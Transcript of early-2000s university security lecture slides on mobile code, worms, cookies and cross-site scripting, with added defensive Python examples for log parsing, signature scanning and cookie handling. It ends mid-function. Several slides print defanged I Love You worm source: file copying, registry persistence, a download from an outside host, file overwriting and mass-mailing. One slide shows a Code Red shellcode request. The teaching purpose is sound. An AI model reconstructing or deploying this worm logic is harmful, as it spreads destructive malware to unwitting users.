20771: Computer Security Lecture 5: ATTACK WEEK - PowerPoint PPT Presentation

Description: Lecture 5, 20-771: Computer Security, Fall 2001 (PowerPoint presentation, 42 slides, provided by robertth).

Transcript and Presenter's Notes

1
20-771 Computer Security, Lecture 5: ATTACK WEEK
  • Robert Thibadeau
  • School of Computer Science
  • Carnegie Mellon University
  • Institute for eCommerce, Fall 2000

2
Today's lecture
  • Mobile Code
  • Break (10 min)
  • Cookies
  • Cross Machine Scripting

3
This Week
  • Chapters 6,7 WS
  • More on Linux

4
http://xiotech.ulib.org/class
5
X.509v3
  • Need a public key to open it, i.e., you can
    authenticate the source
  • Contains encrypted information that the source
    can communicate to you in privacy and with
    authority.
  • Authenticated, private, tamperproof,
    authorization
  • Can be employed as the basis for PKI chaining
    authority
  • Pass something up the chain for approval
    (signing) to provide the absolute authority
  • I.e., the President's office confirms such and
    such a directive.

6
X.509v3 Certificate
  • (Base64-encoded certificate body omitted; it is
    decoded on the next two slides)

7
X.509v3 Opened!
  • Certificate:
  • Data:
  • Version: 3 (0x2)
  • Serial Number: 1 (0x1)
  • Signature Algorithm: md5WithRSAEncryption
  • Issuer: C=XY, ST=Snake Desert, L=Snake Town,
    O=Snake Oil, Ltd, OU=Certificate Authority,
    CN=Snake Oil CA/Email=ca@snakeoil.dom
  • Validity
  • Not Before: Oct 21 18:21:51 1999 GMT
  • Not After: Oct 20 18:21:51 2001 GMT
  • Subject: C=XY, ST=Snake Desert, L=Snake Town,
    O=Snake Oil, Ltd, OU=Webserver Team,
    CN=www.snakeoil.dom/Email=www@snakeoil.dom
  • Subject Public Key Info:
  • Public Key Algorithm: rsaEncryption
  • RSA Public Key: (1024 bit)
  • Modulus (1024 bit):

8
X.509v3 Opened (2)
  • (1024-bit RSA modulus hex omitted)
  • Exponent: 65537 (0x10001)
  • X509v3 extensions:
  • X509v3 Subject Alternative Name:
  • email:www@snakeoil.dom
  • Netscape Comment:
  • mod_ssl generated custom server certificate
  • Netscape Cert Type:
  • SSL Server
  • Signature Algorithm: md5WithRSAEncryption
    (signature bytes omitted)

9
Active Content (also called Mobile Code)
  • Web browsers can download and execute software
    automatically, without warning.
  • The software may damage the user's system or
    violate privacy.
  • Administrator: this can tunnel through firewall
    protections.
  • Case: the U.S. Government came close, within two
    weeks, to an executive order that would have shut
    down all mobile code in the government.
  • Failed: this would dumb down Federal employees
    and make the Government stupid.

10
Threats from Mobile Code
  • Purposefully malicious
  • The Moldovan Connection
  • Sexygirls.com and Erotic2000.com
  • Users downloaded and ran a "viewer"; the program
    hung up the modem and placed a long-distance call
    to Moldova at $2 per minute.
  • The user, taken to the site, stayed around
    without knowing about the charge.
  • I Love You Worm: probable accidental escape.
  • Big programs have bugs
  • Other people will exploit those bugs

11
Traditional Threats
  • Trojan Horses: very serious. Often used for
    spying (e.g., change the login program to create
    a back door).
  • Virus: code that replicates itself and inserts
    itself into an executable program or file.
  • Macro viruses: viruses written in the macro
    language of a word processor or other trusted
    program. Become infectious on other documents.
  • Rabbits: programs that make many copies of
    themselves. Standalone. Denial of service.
  • Worms: similar, but spread across a network.

12
Many, Many Threats
  • I Love You
  • Opening email that says "I Love You" from a
    person you know: Trojan Horse
  • Reads your address book: privacy violation
  • Deletes image files: havoc
  • Across the network: worm
  • Demonstrated:
  • Microsoft Outlook could execute seriously
    destructive and intrusive active content without
    the user's control.

13
Silent Information Thieves!
  • Access log - my NeXT machine in my office (BSD
    4.2) (/private/adm/network):
  • May  9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173
  • May  9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net) lookup failure
  • May  9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173
  • May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.com
  • May 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.com
  • May 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.com
  • May 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.ca
  • May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4
  • May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4
  • May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4
  • May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4
  • May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.com
  • May 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.com
  • May 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.com
  • May 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.edu
  • May 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76
  • May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.com
  • May 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130
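An added example, not from the lecture: a small parser and per-source summariser for connect lines of the kind shown above. The sample lines are a subset of the slide's entries rewritten in syslog form (the slide lost its colons and brackets), and the rule that three or more connects from one source inside one clock minute count as a burst is this example's assumption.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the slide's entries in the
# "Mon DD HH:MM:SS host daemon[pid]: message" form BSD syslog uses.
SAMPLE_LOG = """\
May  9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173
May  9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net) lookup failure
May  9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173
May 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.com
May 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.com
May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4
May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4
May 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.edu
"""

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<hms>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<daemon>[a-z]+)\[(?P<pid>\d+)\]: "
    r"(?P<refused>refused )?connect from (?P<src>\S+)$")


def parse_line(line):
    """Fields of one connect / refused-connect line, or None for anything
    else (the gethostbyname failure above is skipped on purpose)."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def summarise(text, burst_threshold=3):
    """Per source host: total connects, refused connects, which daemons it
    touched, and whether burst_threshold or more connects landed inside one
    clock minute (assumed here to be the footprint of an automated scanner)."""
    per_src = defaultdict(lambda: {"connects": 0, "refused": 0,
                                   "services": set(), "burst": False})
    per_minute = defaultdict(int)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_src[rec["src"]]
        s["connects"] += 1
        s["refused"] += 1 if rec["refused"] else 0
        s["services"].add(rec["daemon"])
        minute = (rec["src"], rec["mon"], rec["day"], rec["hms"][:5])
        per_minute[minute] += 1
        if per_minute[minute] >= burst_threshold:
            s["burst"] = True
    return dict(per_src)


def suspicious(summary):
    """Sources worth a second look: anything the host's access control
    refused, or anything that connected in a burst."""
    return sorted(src for src, s in summary.items()
                  if s["refused"] or s["burst"])
```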

15
Economic Costs (Computer Economics, 8-01)
  • Love Bug: $8.7 Billion
  • Melissa: $1.2 Billion
  • Code Red: $2.6 Billion
  • 250,000 systems in just nine hours on July 19
  • 150,000 in 24 hours on Aug 1, after warnings
  • Repair costs, loss of productivity, and unknown
    cost of asset loss

16
I Love You Code (virus has been killed; file name
was vxryfunny.vbs)
  • rxm barok -lovxlxttxr(vbx)
  • rxm by spydxr / ispydxr_at_mail.com /
    _at_GRAMMxRSoft Group / Manila,Philippinxs
  • dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow
  • Sxt fso CrxatxObj("Scripting.FilxSystxmObj")
  • sxt filx fso.OpxnTxxt(WScript.ScriptFullnamx,1)
  • vbscopyfilx.RxadAll

17
I Love You Code 2
  • main()
  • sxt wscrCrxatxObj("WScript.Shxll")
  • rrwscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Micros
    oft\Windows Scripting Host\Sxttings\Timxout")
  • wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsof
    t\Windows Scripting Host\Sxttings\Timxout",0,"RxG_
    DWORD"
  • Sxt dirwin fso.GxtSpxcialFoldxr(0)
  • Sxt dirsystxm fso.GxtSpxcialFoldxr(1)
  • Sxt dirtxmp fso.GxtSpxcialFoldxr(2)
  • Sxt c fso.GxtFilx(WScript.ScriptFullNamx)
  • c.Copy(dirsystxm"\MSKxrnxl32.vbs")
  • c.Copy(dirwin"\Win32DLL.vbs")
  • c.Copy(dirsystxm"\Vxry Funny.vbs")
  • rxgruns()
  • html()
  • sprxadtoxmail()
  • listadriv()

18
I Love You Code 3 rxgruns()
  • sub rxgruns()
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm"\
    MSKxrnxl32.vbs"
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin
    "\Win32DLL.vbs"
  • Dnrxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
    txrnxt xxplorxr\Download Dirory")
  • rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt
    xxplorxr\Main\Start Pagx","http//www.skyinxt.nxt/
    young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw658
    7345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad"\
    WIN-BUGSFIX.xxx"
  • rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
    txrnxt xxplorxr\Main\Start Pagx","aboutblank"
  • xnd sub

19
I Love You Code 4: Listing the Drives on Your
Machine (there were several of these utility-type
spies)
  • sub listadriv
  • Dim d,dc,s
  • Sxt dc fso.Drivxs
  • For xach d in dc
  • If d.DrivxTypx 2 or d.DrivxTypx3 Thxn
  • foldxrlist(d.path"\")
  • xnd if
  • Nxxt
  • listadriv s
  • xnd sub

20
I Love You Code 5: re-writing jpg files
  • sub inffilxs(foldxrspxc)
  • sxt f fso.GxtFoldxr(foldxrspxc)
  • sxt fc f.Filxs
  • for xach f1 in fc
  • xxtfso.GxtxxtxnsionNamx(f1.path)
  • if (xxt"vbs") or (xxt"vbx") thxn
  • sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
  • ap.writx vbscopy
  • ap.closx
  • xlsxif(xxt"jpg") or (xxt"jpxg") thxn
  • sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
  • ap.writx vbscopy
  • ap.closx (did same for mp3 files and others)

21
I Love You Code 6: .ini
  • if (xqfoldxrspxc) thxn
  • if (s"mirc32.xxx") or (s"mlink32.xxx") or (s"mirc.ini") or
    (s"script.ini") or (s"mirc.hlp") thxn
  • sxt scriptinifso.CrxatxTxxtFilx(foldxrspxc"\script.ini")
  • scriptini.WritxLinx "script"
  • scriptini.WritxLinx "mIRC Script"
  • scriptini.WritxLinx " Plxasx dont xdit this script... mIRC will
    corrupt, if mIRC will"
  • scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run
    corrly. thanks"
  • scriptini.WritxLinx ""
  • scriptini.WritxLinx "Khalxd Mardam-Bxy"
  • scriptini.WritxLinx "http//www.mirc.com"
  • scriptini.WritxLinx ""
  • scriptini.WritxLinx "n0on 1JOIN"
  • scriptini.WritxLinx "n1 /if ( nick mx ) halt "
  • scriptini.WritxLinx "n2 /.dcc sxnd nick "dirsystxm"\Vxry Funny.HTM"
  • scriptini.WritxLinx "n3"
  • scriptini.closx
  • xqfoldxrspxc
  • nxxt
  • xnd sub
23
I Love You Code 8: spread mail
  • sub sprxadtoxmail()
  • sxt rxgxditCrxatxObj("WScript.Shxll")
  • sxt outWScript.CrxatxObj("Outlook.Application")
  • sxt mapiout.GxtNamxSpacx("MAPI")
  • for ctrlists1 to mapi.AddrxssLists.Count
  • sxt amapi.AddrxssLists(ctrlists)
  • rxgvrxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"a)
  • if (int(a.Addrxssxntrixs.Count)int(rxgv)) thxn
  • for ctrxntrixs1 to a.Addrxssxntrixs.Count
  • malxada.Addrxssxntrixs(x)
  • rxgad""
  • rxgadrxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"malxad)
  • if (rxgad"") thxn
  • sxt malxout.CrxatxItxm(0)
  • malx.Rxcipixnts.Add(malxad)
  • malx.Subj "fwd Jokx"
  • malx.Body vbcrlf""
  • malx.Attachmxnts.Add(dirsystxm"\Vxry Funny.vbs")
  • malx.Sxnd
  • Sxt outNothing
  • Sxt mapiNothing
  • xnd sub
24
Silent Attacks
  • It should be obvious that it would not be hard to
    create a silent worm that sends mail about your
    file systems, files, and address lists (and also
    all your mail on your local machine).
  • We can do this with your web browser too
  • Code Red is only ONE example

25
Virus Checkers
  • Pattern match, in secret ways, to find viral
    fingerprints
  • Use a technique called finite state automata to
    create a very fast search over your files.
  • If the virus is not already known, it will do damage.
  • Finding silent viruses may be hard.
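An added example of the finite-state-automaton search described above (the Aho-Corasick construction), not code from the lecture or from any scanner product; the two signature strings and the sample data are constructed for the demo and are not real scanner signatures.

```python
from collections import deque

# Constructed signatures: two strings a scanner might look for in a VBScript
# mass-mailer like the one on slides 16-23 (shown there with 'e' replaced by
# 'x'); real signature databases are far larger and usually kept secret.
SIGNATURES = {
    "vbs-dropper": b"MSKernel32.vbs",
    "outlook-spread": b"Outlook.Application",
}


def build_automaton(signatures):
    """Aho-Corasick construction: a trie of all signatures (goto), failure
    links to the longest proper suffix that is also a trie prefix (fail),
    and the set of signatures ending at each state (out)."""
    goto, out = [{}], [set()]
    for name, pattern in signatures.items():
        state = 0
        for byte in pattern:
            if byte not in goto[state]:
                goto[state][byte] = len(goto)
                goto.append({})
                out.append(set())
            state = goto[state][byte]
        out[state].add(name)
    fail = [0] * len(goto)
    queue = deque(goto[0].values())          # depth-1 states fail to the root
    while queue:                             # breadth-first, so fail[r] is final
        r = queue.popleft()
        for byte, s in goto[r].items():
            queue.append(s)
            f = fail[r]
            while f and byte not in goto[f]:
                f = fail[f]
            fail[s] = goto[f].get(byte, 0)
            out[s] |= out[fail[s]]           # a shorter signature ending here too
    return goto, fail, out


def scan_chunks(chunks, automaton):
    """One pass over the data, one state transition per byte, whatever the
    number of signatures. The state carries across chunk boundaries, so a
    signature split between two reads is still found. Returns
    [(signature name, offset of its last byte)]."""
    goto, fail, out = automaton
    state, offset, hits = 0, 0, []
    for chunk in chunks:
        for byte in chunk:
            while state and byte not in goto[state]:
                state = fail[state]
            state = goto[state].get(byte, 0)
            for name in sorted(out[state]):
                hits.append((name, offset))
            offset += 1
    return hits


def scan_file(path, automaton, chunk_size=64 * 1024):
    """Scan a file without loading it whole."""
    with open(path, "rb") as fh:
        return scan_chunks(iter(lambda: fh.read(chunk_size), b""), automaton)
```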

26
Break!
27
Authenticode System
  • Windows 2000
  • Running code requires an X.509v3 certificate from
    an approved CA
  • Personal Publishers (ID with a credit bureau)
  • Commercial Publishers (Articles of Incorporation)
  • Sign a pledge: "reasonable care consistent with
    prevailing industry standards to keep code free
    from viruses, malicious code, and other data that
    may damage, misappropriate, or otherwise
    interfere with a third party's operations."
  • Remedy: revoke your certificate (HA!)

28
Steps you can Take
  • Don't run as administrator/root
  • Use Virus Checkers (but watch those companies!!!)
  • Backup Often
  • Verify the integrity and authenticity of
    software.
  • A very good idea is to not accept active code
    without a certificate that guarantees the author
    can be found!
  • Same principle as mutually assured destruction,
    or keep the pilot on the plane! He won't hurt
    you if you can hurt him.

29
Finally,
  • Even if Adobe is the authentic code
    writer/distributor, get them to agree to your
    privacy!

30
Record of URLs you've visited
  • Browser history file, document cache, and cookies
  • Unix spools or /var/adm; Windows /winnt,
    /windows, program files/netscape, etc.
  • Mobile code can read these.
  • Organization's firewall or proxy server (most have
    logging capability)
  • ISP's firewall, router, or proxy server.
  • Each of the remote servers you've visited.

31
Web Server
  • Standard Logs
  • HTTP header information
  • Date, From, URI, Referrer, Response Status to
    Request
  • Also from HTTPS! (The Server Knows!)
  • Logs are essential to security
  • Fancier Logs
  • HTTP
  • What's in the forms
  • What's in the responses
  • Really fancy
  • Dynamically changing information based on where
    you've been.
  • Tracking across web servers.

32
Code Red Log
  • 12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858
    %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858
    %ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00
    %u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
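An added example, not from the lecture: parsing common-log-format lines like the one above and flagging the Code Red request pattern (a GET for /default.ida whose query is a long run of one filler letter followed by %u-encoded values). The sample line is the slide's request rebuilt with a 224-byte filler and its %u payload; the minimum filler length of 100 and the second, ordinary request are this example's own choices.

```python
import re
from collections import Counter

# Apache/NCSA common log format, as on the slide.
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$')

# Code Red's request: /default.ida? then a long run of one filler letter
# (the bytes that overflow the .ida ISAPI handler) and then %u-encoded
# 16-bit values. A minimum filler length of 100 is this demo's assumption.
IDA_RE = re.compile(
    r'^/default\.ida\?(?P<filler>(?P<ch>[A-Za-z])(?P=ch){99,})'
    r'(?P<payload>(?:%u[0-9a-fA-F]{4})+)')


def parse_clf(line):
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Parse one log line and attach a verdict: None if it is not a CLF
    line, 'clean', or 'code-red-probe' with the filler letter, the filler
    length and the number of %u escapes that followed it."""
    rec = parse_clf(line)
    if rec is None:
        return None
    m = IDA_RE.match(rec["uri"])
    if m is None:
        rec["verdict"] = "clean"
    else:
        rec["verdict"] = "code-red-probe"
        rec["filler"] = m.group("ch")
        rec["filler_len"] = len(m.group("filler"))
        rec["u_escapes"] = len(m.group("payload")) // 6
    return rec


def probes_by_source(lines):
    """Count probes per source address. On a server with no .ida handler,
    like the Apache host that logged the slide's line, the request simply
    gets a 404: the probe was recorded, not executed."""
    return Counter(r["src"] for r in map(classify, lines)
                   if r and r["verdict"] == "code-red-probe")


# Constructed sample: the slide's line rebuilt, plus one ordinary request.
PAYLOAD = ("%u9090%u6858%ucbd3%u7801" * 3
           + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
SAMPLE_LINES = [
    '12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET /default.ida?'
    + "X" * 224 + PAYLOAD + ' HTTP/1.0" 404 278',
    '10.0.0.5 - - [09/Sep/2001:04:08:00 -0400] "GET /index.html HTTP/1.0" 200 1234',
]
```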

33
Code Red I and II:
http://www.eeye.com/html/Research/Advisories/AL20010804.html

34
Cookies (Netscape cookie file)
  • Columns: URL invoking it | domain-wide? | path in server |
    https only? | expiration | name | value
  • www.airtime.co.uk  FALSE  /users/wysywig/  FALSE  968081837  username  aaa
  • www.kbb.com  FALSE  /kb/ki.dll  FALSE  9519638334  zipcode  15638
  • www.jcpenney.com  FALSE  /jcp  FALSE  126632340  ShopperManager6Fjcp  SHOPPERMANAGER6FJCP6EJSN34316NP100L1RURQ8HHF8MX34
  • www.buy.com  FALSE  /bc  FALSE  128333061  ShopperManager6F  SHOPPERMANAGER6FVQ8VSKLCWHSN000CM9C9JS7EDVL1
  • .doubleclick.net  TRUE  /  FALSE  196034991340  id  39609560
  • .lycos.com  TRUE  /  FALSE  161735952  CyberTargetAnonymous  LYC000AFBAE77275BF6D2734BFCF563A16
  • .cmgi.com  TRUE  /  FALSE  16173595634  CyberGlobalAnonymous  CTG00017D567763405BF1FB34F8BFCD8B1D33
  • .webcrawler.com  TRUE  /  FALSE  9342341600  registered  no
  • .webcrawler.com  TRUE  /  FALSE  9342341600  UID  210076B35C89A5C
  • .microsoft.com  TRUE  /  FALSE  1065303482  MC1  GUIDDF160779710D118B1808006BB734F3F
  • .washingtonpost.com  TRUE  /  FALSE  9342951343  RMID  98c81c8d3606d690
  • www.americanbible.org  FALSE  /  FALSE  16308113498  Int  343 346 38 3 343 38 30 3 334 68 5 3
  • www.americanbible.org  FALSE  /  FALSE  1630811600  User Profile  F633C7686DA1FDBE85880034CDB11

35
Cookies (Netscape cookie file)
  • Columns: URL invoking it | domain-wide? | path in server |
    https only? | expiration | name | value
  • www.antiquebooks.net  FALSE  /  FALSE  938368777  ulantique  7-1-6-win-ns
  • classics.mit.edu  FALSE  /  FALSE  934285095  ICA_last_work  Homer.iliad
  • .jcpenny.com  TRUE  /  FALSE  60516333438  SITESERVER  ID=69bcf8f963456b19fffdf1ff19f
  • .amazon.com  TRUE  /  FALSE  6086797993  ubid-main  06-6073435981034
  • nonprofit.guidestar.org  FALSE  /  FALSE  613723673  CFID  95690
  • .google.com  TRUE  /  FALSE  6134736834347  ID  34816dff31190ff80
  • .cmu.edu  TRUE  /  FALSE  6051263400  SITESERVER  ID=f8185834df6bac5f80a793a534c18
  • .waterhouse.com  TRUE  /  FALSE  963585098  accountno  35869873
  • tracking.carprices.com  FALSE  /  FALSE  9634234581  PARTNER  CARPRICES
  • tracking.carprices.com  FALSE  /  FALSE  9634234581  MEMB_ID  -1
  • tracking.carprices.com  FALSE  /  FALSE  9634234581  USER  10.8.1.35-1
  • tracking.carprices.com  FALSE  /  FALSE  9634234578  RETURN  VISITOR

36
Cookies: Server Writes to Browser
  • Set-Cookie: NAME=VALUE; expires=DATE; path=PATH;
    domain=DOMAIN_NAME; secure
  • NAME=VALUE
  • expires=DATE
  • domain=DOMAIN_NAME
  • The default value of domain is the host name of
    the server which generated the cookie response.
  • path=PATH
  • The path attribute is used to specify the subset
    of URLs in a domain for which the cookie is
    valid.
  • secure
  • If a cookie is marked secure, it will only be
    transmitted if the communications channel with
    the host is a secure one. Currently this means
    that secure cookies will only be sent to HTTPS
    (HTTP over SSL) servers. If secure is not
    specified, a cookie is considered safe to be sent
    in the clear over unsecured channels.

37
Browser Volunteers Cookie to Server!
  • If the browser visits the URL again, it volunteers
    the cookie name and contents to the URL
  • Cookie: NAME1=OPAQUE_STRING1; NAME2=OPAQUE_STRING2
    ...
  • Server Database can contain
  • Cookie Name
  • Opaque String
  • Who (what IP/Host/User/etc) reported it
  • When

38
Cookie Source Code (www.mozilla.org)
  • Cookie file line format: host \t isDomain \t path \t xxx \t
    expires \t name \t cookie, from
    http://lxr.mozilla.org/seamonkey/source/extensions/cookie/nsCookie.cpp#2078
  • JavaScript interface! (Fields shown in red on the
    original slide are read-only.)
    Name         Type     Description
    path         string   path the cookie applies to
    domain       string   domain the cookie applies to
    name         string   name of the cookie
    value        string   value of the cookie
    expires      string   date the cookie expires
    url          string   url setting the cookie (TROJAN HORSE OPPORTUNITY!)
    isSecure     boolean  the cookie is sent over secure connections only
    isDomain     boolean  the cookie has a domain attribute
    prompt       boolean  user has configured prefs to throw cookie confirm dialog
    preference   int      the user's cookie acceptance value
    accept()     method   allows the cookie to be set
    reject()     method   causes the cookie not to be set
    ask()        method   prompt a netlib confirmation dialog
                          (happens during netlib set-cookie execution)

39
Cookies - Notes
  • Multiple Set-Cookie headers may appear in a single
    server response.
  • Same path but different names will add additional
    mappings.
  • A higher-level path value does not override more
    specific path mappings.
  • The expires attribute lets the client purge the
    mapping, but it is not required.
  • Number of cookies that a client can store at any
    one time:
  • 300 total cookies
  • 4 kilobytes per cookie
  • 20 cookies per server or domain.
  • A CGI script deletes a cookie by returning the
    same cookie with an expired time.
  • This requirement makes it difficult for anyone
    but the originator of a cookie to delete a
    cookie.
  • The Set-Cookie response header should never be
    cached.
  • If a proxy server receives a response containing
    Set-Cookie, it should propagate the Set-Cookie
    header to the client, regardless of whether the
    response was 304 (Not Modified) or 200 (OK).
  • Similarly, if a client request contains a Cookie
    header, it should be forwarded through a proxy,
    even if a conditional If-Modified-Since request
    is being made.
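An added example, not from the lecture or from any browser, that puts the rules of the three preceding cookie slides (the Set-Cookie attributes, the Cookie header the browser volunteers, and the limits and deletion rule in the notes) into a small cookie jar. Host names, cookie names and values used in the tests are constructed; the requirement that a domain attribute contain at least two dots is a simplification of the Netscape rule.

```python
import calendar
import time
from urllib.parse import urlsplit

# Limits quoted on the notes slide.
MAX_TOTAL, MAX_PER_DOMAIN, MAX_BYTES = 300, 20, 4096


def parse_expires(text):
    """Netscape cookie date, e.g. 'Wed, 09-Nov-2005 23:12:40 GMT', to epoch seconds."""
    return calendar.timegm(time.strptime(text, "%a, %d-%b-%Y %H:%M:%S GMT"))


def domain_matches(host, domain):
    """Tail match: 'cs.cmu.edu' matches '.cmu.edu'; a bare host matches only itself."""
    host, domain = host.lower(), domain.lower()
    return host == domain or (domain.startswith(".") and host.endswith(domain))


class CookieJar:
    def __init__(self):
        self.cookies = []                      # insertion order = age

    def set_cookie(self, header, url, now):
        """Apply one Set-Cookie header received in a response from url.
        Returns False if the cookie is rejected."""
        parts = [p.strip() for p in header.split(";")]
        name, _, value = parts[0].partition("=")
        u = urlsplit(url)
        c = {"name": name.strip(), "value": value.strip(), "domain": u.hostname,
             "path": u.path.rsplit("/", 1)[0] or "/",   # default: directory of the URL
             "expires": None, "secure": False}
        for attr in parts[1:]:
            k, _, v = attr.partition("=")
            k, v = k.strip().lower(), v.strip()
            if k == "expires":
                c["expires"] = parse_expires(v)
            elif k == "domain":
                # A server may only set cookies for a domain it belongs to, and
                # the domain needs at least two dots (so never just ".com").
                if not domain_matches(u.hostname, v) or v.count(".") < 2:
                    return False
                c["domain"] = v.lower()
            elif k == "path":
                c["path"] = v
            elif k == "secure":
                c["secure"] = True
        if len(c["name"]) + len(c["value"]) > MAX_BYTES:
            return False
        key = (c["name"], c["domain"], c["path"])
        # Same name, domain and path replaces the old mapping. Sending it back
        # with an already-expired date is how the originator deletes it.
        self.cookies = [o for o in self.cookies
                        if (o["name"], o["domain"], o["path"]) != key]
        if c["expires"] is not None and c["expires"] <= now:
            return True
        same_domain = [o for o in self.cookies if o["domain"] == c["domain"]]
        if len(same_domain) >= MAX_PER_DOMAIN:
            self.cookies.remove(same_domain[0])   # evict that domain's oldest
        if len(self.cookies) >= MAX_TOTAL:
            self.cookies.pop(0)
        self.cookies.append(c)
        return True

    def cookie_header(self, url, now):
        """The Cookie header the browser volunteers for url, or None. Secure
        cookies go only over https; more specific paths are listed first."""
        u = urlsplit(url)
        chosen = [c for c in self.cookies
                  if domain_matches(u.hostname, c["domain"])
                  and (u.path or "/").startswith(c["path"])
                  and (not c["secure"] or u.scheme == "https")
                  and (c["expires"] is None or c["expires"] > now)]
        chosen.sort(key=lambda c: -len(c["path"]))
        if not chosen:
            return None
        return "; ".join("%s=%s" % (c["name"], c["value"]) for c in chosen)
```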

40
Two Sides
  • Buyer wants things without exposing any
    information he discloses to any use other than
    what they MUST have to give him the things he
    wants. (Cryptophilia)
  • Seller wants to know as much about Buyer as
    possible, because this gives him control over
    Buyers and therefore revenue. He can also sell
    this information (e.g., to advertisers). He wants
    unrestricted use of this information.
  • BUT, Buyers now collect information on Sellers
    and misuse that. (The Sky is Falling.)
  • An agreement is bilateral. The Internet can make
    possible agreements public and thereby expose
    both Sellers and Buyers to violations.

41
Cross Site Scripting
  • Same as cross machine cookies
  • Fill in a form with a script (
  • Web Server returns blindly printing script
  • Filter these characters out
  • " ' ) ( -
  • But, What about the situation where you want
    somebody to click you and know where they clicked
    from (double click).
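An added example, not from the lecture: the referrer-link page from the last bullet, first echoing form input blindly as the slide describes, then with HTML output encoding plus a URL allow-list, which keeps the link working without stripping any characters. The Referer and comment values are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed inputs: a Referer carrying an ad-network style query string,
# and a comment field containing a script tag.
REFERER = "http://www.doubleclick.net/click?id=39609560&site=jcpenney"
COMMENT = "<script>alert(1)</script>"


def render_blindly(referer, comment):
    """The pattern the slide warns about: form input is echoed into the
    page unchanged, so a script in the field runs in every visitor's browser."""
    return '<p>Your comment: %s</p>\n<p>You came from <a href="%s">%s</a></p>' % (
        comment, referer, referer)


def safe_href(url):
    """Only absolute http(s) URLs qualify for the 'where you came from' link;
    javascript:, data: and malformed values yield None and no link is emitted."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return url


def render_safely(referer, comment):
    """Same page with output encoding instead of character filtering: the
    comment is escaped as text, the referer is escaped as an attribute
    value, and the link survives because nothing is stripped."""
    out = ["<p>Your comment: %s</p>" % html.escape(comment, quote=True)]
    href = safe_href(referer)
    if href is not None:
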